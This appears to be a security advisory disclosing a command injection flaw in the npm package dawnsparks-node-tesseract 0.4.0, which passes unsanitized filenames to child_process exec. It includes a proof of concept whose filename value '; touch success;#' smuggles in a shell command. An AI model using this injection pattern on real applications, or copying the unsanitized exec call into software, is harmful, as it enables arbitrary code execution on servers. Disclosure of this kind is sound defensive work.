Vulnerability in dawnsparks-node-tesseract
This report details an ACI vulnerability affecting dawnsparks-node-tesseract@0.4.0.
Package source
- https://www.npmjs.com/package/dawnsparks-node-tesseract
- https://github.com/rona-dinihari/dawnsparks-node-tesseract
Package description
"A simple wrapper for the Tesseract OCR package for node.js"
Vulnerability Overview
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).
If (attacker-controlled) user-named image file is given to the process function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.
This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].
[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
Reproduction
To exploit this vulnerability, a user must submit an image file to a Node.js application that is using "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the user's submitted image filename contains shell commands, those will be evaluated, allowing the user to execute arbitrary commands on the application's server.
The proof-of-concept (PoC) program below illustrates the issue for version 0.4.0. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.
var PUT = require('dawnsparks-node-tesseract');
var user_image_filename = "; touch success;#";
try {
new PUT.process(user_image_filename,{},function(){});
} catch (e) {
console.log(e);
}
Environment: Node.js v15.5.1 on Linux
Steps to reproduce:
npm i dawnsparks-node-tesseract@0.4.0- Create a file, e.g.,
poc0.js, containing the PoC code. - Execute the file:
node poc0.js
A file called success will be created as a result of the execution of the PoC.
Remarks
This vulnerability was originally discovered in version 0.3.3 of this package, which was previously named "huedawn-tesseract" (unpublished from npm).